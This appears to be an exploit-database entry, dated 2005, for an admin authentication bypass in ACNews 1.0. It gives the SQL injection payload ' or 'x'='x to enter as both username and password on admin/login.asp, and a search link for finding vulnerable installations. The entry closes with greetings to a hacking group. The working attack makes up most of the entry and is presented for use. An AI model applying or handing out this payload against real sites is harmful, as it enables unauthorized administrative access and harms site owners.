id: 94
date: 04/08/2005
title: ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit
author: LaMeR
cves: 

===============================================================
ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit
===============================================================




# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke

Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection

[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.

greetz to HaXoR & LOverboy

auther : LaMeR

securitygurus team



#  0day.today [2023-03-23]  #